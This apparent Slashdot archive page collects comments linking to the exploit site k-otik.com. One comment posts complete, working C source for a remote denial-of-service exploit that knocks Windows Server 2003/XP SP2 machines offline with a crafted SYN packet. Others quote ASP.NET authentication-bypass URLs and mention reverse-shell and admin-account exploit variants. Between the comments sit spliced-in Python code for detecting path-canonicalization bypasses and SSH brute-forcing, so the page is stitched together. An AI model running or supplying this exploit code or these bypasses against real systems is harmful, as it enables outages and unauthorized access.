Domain: k-otik.com
Stories and comments across the archive that link to k-otik.com.
Comments · 20
-
exploit
Courtesy of the fine (French) folk at k-otik.org... an exploit.
Unfortunately the b0rked Slashdot lameness filter won't allow code to be posted even when 'post as code' is selected :?
-
Exploit
Courtesy of the fine (French) folk at k-otik.org... an exploit. Curse this slashcode lameness filter...
#define _BSD_SOURCE
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

/* Windows Server 2003 and XP SP2 remote DoS exploit
   Tested under OpenBSD 3.6 at WinXP SP 2
   Vuln by Dejan Levaja
   (c)oded by __blf 2005 RusH Security Team , http://rst.void.ru
   Gr33tz: zZz, Phoenix, MishaSt, Inck-vizitor
   Fuck lamerz: Saint_I, nmalykh, Mr. Clumsy
   All rights reserved. */

//checksum function by r0ach
u_short checksum (u_short *addr, int len)
{
    u_short *w = addr;
    int i = len;
    int sum = 0;
    u_short answer;

    while (i > 0) {
        sum += *w++;
        i -= 2;
    }
    if (i == 1)
        sum += *(u_char *)w;
    sum = (sum >> 16) + (sum & 0xffff);
    sum = sum + (sum >> 16);
    return (~sum);
}

int main(int argc, char ** argv)
{
    struct in_addr src, dst;
    struct sockaddr_in sin;
    struct _pseudoheader {
        struct in_addr source_addr;
        struct in_addr destination_addr;
        u_char zero;
        u_char protocol;
        u_short length;
    } pseudoheader;
    struct ip * iph;
    struct tcphdr * tcph;
    int mysock;
    u_char * packet;
    u_char * pseudopacket;
    int on = 1;

    if( argc != 3) {
        fprintf(stderr, "r57windos.c by __blf\n");
        fprintf(stderr, "RusH Security Team\n");
        fprintf(stderr, "Usage: %s \n", argv[0]);
        return EX_USAGE;
    }
    if ((packet = (char *)malloc(sizeof(struct ip) + sizeof(struct tcphdr))) == NULL) {
        perror("malloc()\n");
        return EX_OSERR;
    }
    inet_aton(argv[1], &src);
    inet_aton(argv[1], &dst);
    iph = (struct ip *) packet;
    iph->ip_v = IPVERSION;
    iph->ip_hl = 5;
    iph->ip_tos = 0;
    iph->ip_len = ntohs(sizeof(struct ip) + sizeof(struct tcphdr));
    iph->ip_off = htons(IP_DF);
    iph->ip_ttl = 255;
    iph->ip_p = IPPROTO_TCP;
    iph->ip_sum = 0;
    iph->ip_src = src;
    iph->ip_dst = dst;
    tcph = (struct tcphdr *)(packet + sizeof(struct ip));
    tcph->th_sport = htons(atoi(argv[2]));
    tcph->th_dport = htons(atoi(argv[2]));
    tcph->th_seq = ntohl(rand());
    tcph->th_ack = rand();
    tcph->th_off = 5;
    tcph->th_flags = TH_SYN; // setting up TCP SYN flag here
    tcph->th_win = htons(512);
    tcph->th_sum = 0;
    tcph->th_urp = 0;
    pseudoheader.source_addr = src;
    pseudoheader.destination_addr = dst;
    pseudoheader.zero = 0;
    pseudoheader.protocol = IPPROTO_TCP;
    pseudoheader.length = htons(sizeof(struct tcphdr));
    if((pseudopacket = (char *)malloc(sizeof(pseudoheader)+sizeof(struct tcphdr))) == NULL) {
        perror("malloc()\n");
        return EX_OSERR;
    }
    memcpy(pseudopacket, &pseudoheader, sizeof(pseudoheader));
    memcpy(pseudopacket + sizeof(pseudoheader), packet + sizeof(struct ip), sizeof(struct tcphdr));
    tcph->th_sum = checksum((u_short *)pseudopacket, sizeof(pseudoheader) + sizeof(struct tcphdr));
    mysock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW);
    if(!mysock) {
        perror("socket!\n");
        return EX_OSERR;
    }
    if(setsockopt(mysock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == -1) {
        perror("setsockopt");
        shutdown(mysock, 2);
        return EX_OSERR;
    }
    sin.sin_family = PF_INET;
    sin.sin_addr = dst;
    sin.sin_port = htons(80);
    if(sendto(mysock, packet, sizeof(struct ip) + sizeof(struct tcphdr), 0, (struct sockaddr *)&sin, sizeof(sin)) == -1) {
        perror("sendto()\n");
        shutdown(mysock, 2);
        return EX_OSERR;
    }
    printf("Packet sent. Remote machine should be down.\n");
    shutdown(mysock, 2);
    return EX_OK;
}
-
The exploit.....
.....is already out.
-
Uhm...
I don't like typing URLs in manually with Internet Explorer, that's why I use Firefox.
Microsoft Not Worried about FireFox
Well, they should be. Let's not forget about the Remote Command Execution Exploit and the HTML Help Control Local Zone Bypass Exploit, all thanks to our favorite Microsoft browser, Internet Explorer. -
Source code...
For those who're interested in the source code of this Sanity.A worm: click.
-
Re:not much...
There are at least two other IE exploits out there that MS has not patched, and SP2 won't protect you. See: http://isc.sans.org/diary.php?date=2004-11-20
Quote:
Two More IE Vulnerabilities
Exploit code has been released for two more Internet Explorer vulnerabilities that were released on Wednesday (Nov. 17). This code would enable an attacker to trick users into executing malware. These vulnerabilities affect Microsoft Internet Explorer 6.0 SP2 and are not prevented by Windows XP SP2.
The original advisory is here: http://secunia.com/advisories/13203/
The proof of concept exploit: http://www.k-otik.com/exploits/2041119.IESP2disclosure.php
While on the topic, it is interesting to note some statistics that Secunia has been compiling about Internet Explorer vulnerabilities:
IE 5.01 - 42 advisories (7 unpatched) http://secunia.com/product/9/
IE 5.5 - 55 advisories (8 unpatched) http://secunia.com/product/10/
IE 6.0 - 69 advisories (18 unpatched) http://secunia.com/product/11/
If you still think SP2 has mystical properties: http://www.safecenter.net/UMBRELLAWEBV4/ie_unpatched/
-
Details from the Internet Storm Center
Microsoft announced a possible vulnerability in ASP.NET (www.microsoft.com/security/incident/aspnet.mspx).
There are not many details so far, but it refers to the "canonicalization" functionality and suggests implementing the hardening measures outlined in KB887459 (support.microsoft.com/?kbid=887459). It appears that a particularly crafted request may confuse ASP.Net and allow access to otherwise protected directories.
If a web server receives a request for a particular URL (e.g. http://server/somedirectory/filename), the 'somedirectory/filename' part has to be mapped to a particular file located on the server. This translation has been the source of many "directory traversal" bugs. The IIS unicode exploit is probably the most famous one.
After our original posting of this diary, a few users pointed to the following articles which provide more details than provided by Microsoft's advisory:
(Thanks to Chaouki & Daniel)
www.heise.de/security/news/meldung/51730 (german)
http://www.derkeiler.com/Mailing-Lists/NT-Bugtraq/2004-09/0068.html
blogs.devleap.com/rob/archive/2004/10/02/1803.aspx (italian)
www.k-otik.com/news/10052004.ASPNETFlaw.php (french)
It appears that by switching a '/' character in the URL with '\' or '%5C', the canonicalization routine will be confused. So if the URL http://www.example.com/secure/file.apx is password protected, using either of the following URLs will bypass the restriction:
http://www.example.com/secure\file.apx
http://www.example.com/secure%5Cfile.apx
In addition to the slash/back-slash confusion, one reader reports that inserting a space will bypass the URL restriction as well: http://www.example.com/%20/secure/file.apx (had no chance to validate this method so far)
URL Obfuscation
Handler and star SANS instructor Ed Skoudis compiled a comprehensive list of various URL obfuscation methods used in phishing schemes and spam. Some of these methods do not work with all browsers (e.g. the %01 issue in older Internet Explorer versions). In order to preserve the tricky details of some of these methods, we set up a page which includes just the URL methods without our usual header and footer: isc.sans.org/presentations/urlobfuscation.php (to view as source: isc.sans.org/presentations/urlobfuscation.txt).
Jan Reilink wrote to point us to this page with more details about URL obfuscation and decoding: www.pc-help.org/obscure.htm.
-
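The slash/backslash and whitespace-segment confusion quoted in the diary above is a canonicalization-before-authorization problem: the access rule is evaluated on the raw request string, while the file mapping later accepts several spellings of the same path. The following is an added example, not code from the diary, from Slashdot or from Microsoft's KB887459 module. It shows the defensive pattern in Python (canonicalize first, then apply the rule) beside the naive prefix check the bypass defeats, and runs a scan over constructed IIS-style log lines that flags any request where the two decisions disagree. The names canonicalize_path, naive_requires_auth, hardened_requires_auth, bypass_suspected and scan_log, the PROTECTED_PREFIXES value and the log lines are all assumptions of this example.

```python
from urllib.parse import unquote

# Assumption of this example: everything under /secure/ needs authentication.
PROTECTED_PREFIXES = ("/secure/",)


def canonicalize_path(raw_path: str) -> str:
    """Reduce a request path to one canonical form before any access decision.

    Steps, chosen to cover the confusions described in the diary:
      1. percent-decode repeatedly, so %5C and double-encoded %255C both
         become a backslash (capped so a pathological input cannot loop);
      2. treat backslash as a path separator, as Windows file mapping does;
      3. drop empty and whitespace-only segments ("/%20/secure" -> "/secure");
      4. resolve "." and ".." segments.
    """
    path = raw_path.split("?", 1)[0].split("#", 1)[0]
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    path = path.replace("\\", "/")
    segments = []
    for seg in path.split("/"):
        if seg.strip() == "" or seg == ".":
            continue
        if seg == "..":
            if segments:
                segments.pop()
            continue
        segments.append(seg)
    return "/" + "/".join(segments)


def naive_requires_auth(raw_path: str) -> bool:
    # Weak rule: a case-sensitive string-prefix test on the raw request,
    # which is exactly what the alternate spellings slip past.
    return raw_path.startswith(PROTECTED_PREFIXES)


def hardened_requires_auth(raw_path: str) -> bool:
    # Hardened rule: canonicalize first, then compare case-insensitively
    # (IIS on NTFS resolves paths case-insensitively, so /SECURE/ is /secure/).
    return canonicalize_path(raw_path).lower().startswith(PROTECTED_PREFIXES)


def bypass_suspected(raw_path: str) -> bool:
    """Detection view: the request relied on an alternate spelling when the
    naive and hardened rules disagree about whether it is protected."""
    return naive_requires_auth(raw_path) != hardened_requires_auth(raw_path)


# Constructed IIS-style log excerpt (date time client method uri-stem uri-query status).
SAMPLE_LOG = """\
2004-10-07 12:00:01 10.0.0.5 GET /secure/file.aspx - 401
2004-10-07 12:00:02 10.0.0.5 GET /secure\\file.aspx - 200
2004-10-07 12:00:03 10.0.0.5 GET /secure%5Cfile.aspx - 200
2004-10-07 12:00:04 10.0.0.5 GET /%20/secure/file.aspx - 200
2004-10-07 12:00:05 10.0.0.9 GET /public/index.aspx - 200
"""


def scan_log(text: str) -> list:
    """Return the uri-stem of every logged request that looks like a bypass attempt."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 5:
            continue
        if bypass_suspected(fields[4]):
            hits.append(fields[4])
    return hits


if __name__ == "__main__":
    for path in scan_log(SAMPLE_LOG):
        print("possible canonicalization bypass:", path, "->", canonicalize_path(path))
```

Comparing the two decisions is a useful detection signal precisely because it catches whatever spelling the weak check tolerates, including ones not enumerated in a pattern list; the cost is that harmless variants such as a differently cased path are flagged too, which for a protected directory is still worth a look.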
Re:Patch is already out
Which isn't really that helpful. However, there's space for 2500 bytes of shell code (i.e. lots of space left in the example on k-otik) for writing something with a reverse shell; in fact, this has already been done, it just isn't public. There's also a newer example on k-otik which adds an administrator account to the system it runs on; however, you'll have to edit some of the code yourself. Script-kiddy-proof.
-
Re:PNG too?
Some related exploits.
Windows JPEG: Windows JPEG Processing Buffer Overrun PoC Exploit (MS04-028)
Qt BMP: Qt 3.x bmp image parsing local buffer overflow Exploit
XV BMP XV v3.x bmp parsing local buffer overflow Exploit
GV Postscript: GV PostScript Viewer Remote Buffer overflow Exploit
LibPNG: LibPNG Graphics Library Remote Buffer Overflow Exploit
-
0day exploit in the wild
It seems that this flaw was reported by the French website security company K-Otik (http://www.k-otik.com), which made this private exploit code go "public".
-
Re:SP2 - as secure as any linux distro...
Root? Unfortunately privilege escalation seems to be a very big problem which does not get as much attention as it deserves.
It's critical that you know and trust your users and take care of what applications you decide to run, especially as plenty of exploits are readily available.
As for the spoofing "Security Center" it ignores the fact that evil.exe required a prerequisite compromise to have taken place.
-
Re:Many more SSH login attempts
I just found they're done by a program called brutessh2. It's a little brute-force scanner like everyone has guessed. You can find the source for it here. Be sure to check your passwords against its password list.
-
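The comment above identifies the login attempts as a brute-force scanner working through a password list. As an added example (not the commenter's code and not related to brutessh2 itself), here is the detection side in Python: aggregate OpenSSH "Failed password" lines per source address and flag sources that either exceed a failure count or cycle through many distinct usernames, the latter being the signature of a scanner walking a user list rather than one person mistyping a password. The regular expression follows the real sshd log wording; the auth.log excerpt, the thresholds and the function names failed_logins and brute_force_sources are assumptions of this example.

```python
import re
from collections import defaultdict

# OpenSSH's failed-password line; captures the username tried and the source IP.
FAILED_RE = re.compile(
    r"sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)

# Constructed auth.log excerpt (not real traffic): one source cycling through
# usernames, one legitimate user who mistyped once and then got in.
SAMPLE_AUTH_LOG = """\
Nov 20 03:12:01 host sshd[1201]: Failed password for invalid user admin from 10.0.0.7 port 51122 ssh2
Nov 20 03:12:03 host sshd[1203]: Failed password for invalid user test from 10.0.0.7 port 51124 ssh2
Nov 20 03:12:05 host sshd[1205]: Failed password for root from 10.0.0.7 port 51126 ssh2
Nov 20 03:12:07 host sshd[1207]: Failed password for root from 10.0.0.7 port 51128 ssh2
Nov 20 03:12:09 host sshd[1209]: Failed password for invalid user oracle from 10.0.0.7 port 51130 ssh2
Nov 20 03:12:11 host sshd[1211]: Failed password for invalid user guest from 10.0.0.7 port 51132 ssh2
Nov 20 03:15:40 host sshd[1300]: Failed password for alice from 192.168.1.20 port 40210 ssh2
Nov 20 03:15:48 host sshd[1302]: Accepted password for alice from 192.168.1.20 port 40212 ssh2
"""


def failed_logins(text: str):
    """Per source IP: total failed attempts and the set of usernames tried."""
    counts = defaultdict(int)
    users = defaultdict(set)
    for line in text.splitlines():
        m = FAILED_RE.search(line)
        if not m:
            continue  # accepted logins and unrelated lines are ignored
        counts[m["ip"]] += 1
        users[m["ip"]].add(m["user"])
    return counts, users


def brute_force_sources(text: str, max_failures: int = 5, max_users: int = 3) -> list:
    """Sources over either threshold. Distinct-username spread is the stronger
    signal: a real user forgets one password, a scanner tries many accounts."""
    counts, users = failed_logins(text)
    return sorted(
        ip for ip in counts
        if counts[ip] >= max_failures or len(users[ip]) >= max_users
    )


if __name__ == "__main__":
    counts, users = failed_logins(SAMPLE_AUTH_LOG)
    for ip in brute_force_sources(SAMPLE_AUTH_LOG):
        print(f"{ip}: {counts[ip]} failures, {len(users[ip])} usernames: {sorted(users[ip])}")
```

A scanner like this only succeeds against accounts whose password is in its list, so the lasting fix is key-based authentication with password logins disabled; the detection above is what tells you which sources to block in the meantime.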
Re: The point everyone misses
-
An example: C code exploit for ASN.1 vuln
Riclewis, I don't know if this fits your definition, but here is a piece of C code that crashes a Windows server by exploiting the ASN.1 vuln. Similar pieces of code have been floating for quite a while since at least October 2003. Some of them are rumored to give you a remote shell, which is not unbelievable.
Was this what you wanted?
-
Re:I'm in the dark ages...I'm still using 2.4.18!
It's strange this is modded +4 funny considering things such as this local root exploit for kernels before 2.4.20 are commonplace.
There are reasons for new releases, and few are funny.